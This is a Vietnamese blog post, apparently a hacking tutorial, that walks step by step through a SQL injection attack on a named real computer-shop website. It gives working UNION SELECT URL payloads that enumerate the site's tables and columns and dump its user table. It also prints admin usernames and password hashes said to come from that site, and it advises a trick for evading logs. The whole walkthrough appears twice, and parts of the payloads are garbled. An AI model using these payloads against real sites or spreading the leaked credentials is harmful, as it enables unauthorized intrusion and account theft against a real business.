[INDENT] http://namphongcomputer.com/?php=product_detail&id=216'
http://namphongcomputer.com/?php=product_detail&id=216 order by 15
-- > Ko lỗi
http://namphongcomputer.com/?php=product_detail&id=216 order by 16
-- > Lỗi
Như vậy là chứng tỏ điều gì nhỉ :-> Có tất cả 15 trường.
Tìm vị trí trường bị lỗi
Dùng câu lệnh UNION SELECT
http://namphongcomputer.com/?php=product_detail&id=216 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
Không thấy số đâu cả :-O …. Ak phải thêm dấu – phía trước số 216 đã
http://namphongcomputer.com/?php=product_detail&id=-216 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
iờ thì thấy các trường bị lỗi rồi nhá 3, 6 ,7
Trường hợp không hiện số thì ta view source để xem Hoặc nhiều cách khác
Giờ thì check version hay user database gì đấy thì tùy mình lười nói tới, đoán chắc trang này ver 5 trở lên nên ta đi vào tìm table luôn
http://namphongcomputer.com/?php=product_detail&id=-216 UNION SELECT 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12, 13,14,15 from information_schema.tables where table_schema=database()-- -
- mình thêm vào phía sau ở đây để tránh log, vì trang này nằm trong tỉnh nên
Ax mà sao ko thấy table nào thế này ==” Đành phải xài unhe
hex thôi
:->
http://namphongcomputer.com/?php=product_detail&id=-216 UNION SELECT 1,2,unhehegroup_concat(table_name))),4,5,6,7,8
,9,10,11,12,13,14,15 from information_schema.tables where
table_schema=database()-- -
-->
tbl_config,tbl_content,tbl_content_category,tbl_me mber,tbl_order,tbl_order_detail,tbl_product,tbl_pr oduct_category,tbl_product_new,tbl_product_special ,tbl_user,tbl_visitor
Nhưng ở đây ta chỉ quan tâm thằng tbl_user thôi
Get column của nó nào :”>
Ý quên, phải chuyển tbl_user sang mã hex đã :”> Vào đây nhé http://www.swingnote.com/tools/texttohex.php
tbl_user sang max hex sẽ là 74626c5f75736572 ta thêm 0x vào thành 0x74626c5f75736572. Để đấy tí có việc
http://namphongcomputer.com/?php=product_detail&id=-216 UNION SELECT 1,2,unhehegroup_concat(column_name))),4,5,6,7,
8,9,10,11,12,13,14,15 from information_schema.columns where
table_schema=database() and table_name=0x74626c5f75736572-- -
Đấy :-> Đặt phía sau table_name, ta có thể thay mã hex bằng char ( phía sau sách tin học 11 có bảng mã ấy đấy =]]]]] )
Xem trong tbl_user có gì nào :->
id, uid, pwd
Giờ là công đoạn cuối Xem user và pass của admin
http://namphongcomputer.com/?php=product_detail&id=-216 UNION SELECT 1,2,unhehegroup_concat(0x20,id,0x7c,uid,0x7c,p
wd))),4,5,6,7,8,9,10,11,12,13,14,15 from tbl_user
0x20 và 0x7c ở đây là dấu cách và dấu | đã sang mã hex :”>
Chúng ta có user và pass admin Pass đang bị mã hóa
1|admincp|00feb756fdb9ba391496f96e702e6d91,
2|coder|202cb962ac59075b964b07152d234b70
http://namphongcomputer.com/?php=product_detail&id=216 order by 15
-- > Ko lỗi
http://namphongcomputer.com/?php=product_detail&id=216 order by 16
-- > Lỗi
Như vậy là chứng tỏ điều gì nhỉ :-> Có tất cả 15 trường.
Tìm vị trí trường bị lỗi
Dùng câu lệnh UNION SELECT
http://namphongcomputer.com/?php=product_detail&id=216 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
Không thấy số đâu cả :-O …. Ak phải thêm dấu – phía trước số 216 đã
http://namphongcomputer.com/?php=product_detail&id=-216 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
iờ thì thấy các trường bị lỗi rồi nhá 3, 6 ,7
Trường hợp không hiện số thì ta view source để xem Hoặc nhiều cách khác
Giờ thì check version hay user database gì đấy thì tùy mình lười nói tới, đoán chắc trang này ver 5 trở lên nên ta đi vào tìm table luôn
http://namphongcomputer.com/?php=product_detail&id=-216 UNION SELECT 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12, 13,14,15 from information_schema.tables where table_schema=database()-- -
- mình thêm vào phía sau ở đây để tránh log, vì trang này nằm trong tỉnh nên
Ax mà sao ko thấy table nào thế này ==” Đành phải xài unhe
hex thôi
:->http://namphongcomputer.com/?php=product_detail&id=-216 UNION SELECT 1,2,unhe
hegroup_concat(table_name))),4,5,6,7,8
,9,10,11,12,13,14,15 from information_schema.tables where
table_schema=database()-- - -->
tbl_config,tbl_content,tbl_content_category,tbl_me mber,tbl_order,tbl_order_detail,tbl_product,tbl_pr oduct_category,tbl_product_new,tbl_product_special ,tbl_user,tbl_visitor
Nhưng ở đây ta chỉ quan tâm thằng tbl_user thôi
Get column của nó nào :”>
Ý quên, phải chuyển tbl_user sang mã hex đã :”> Vào đây nhé http://www.swingnote.com/tools/texttohex.php
tbl_user sang max hex sẽ là 74626c5f75736572 ta thêm 0x vào thành 0x74626c5f75736572. Để đấy tí có việc
http://namphongcomputer.com/?php=product_detail&id=-216 UNION SELECT 1,2,unhe
hegroup_concat(column_name))),4,5,6,7,
8,9,10,11,12,13,14,15 from information_schema.columns where
table_schema=database() and table_name=0x74626c5f75736572-- - Đấy :-> Đặt phía sau table_name, ta có thể thay mã hex bằng char ( phía sau sách tin học 11 có bảng mã ấy đấy =]]]]] )
Xem trong tbl_user có gì nào :->
id, uid, pwd
Giờ là công đoạn cuối Xem user và pass của admin
http://namphongcomputer.com/?php=product_detail&id=-216 UNION SELECT 1,2,unhe
hegroup_concat(0x20,id,0x7c,uid,0x7c,p
wd))),4,5,6,7,8,9,10,11,12,13,14,15 from tbl_user 0x20 và 0x7c ở đây là dấu cách và dấu | đã sang mã hex :”>
Chúng ta có user và pass admin Pass đang bị mã hóa
1|admincp|00feb756fdb9ba391496f96e702e6d91,
2|coder|202cb962ac59075b964b07152d234b70
SƯUTAM
Đăng nhận xét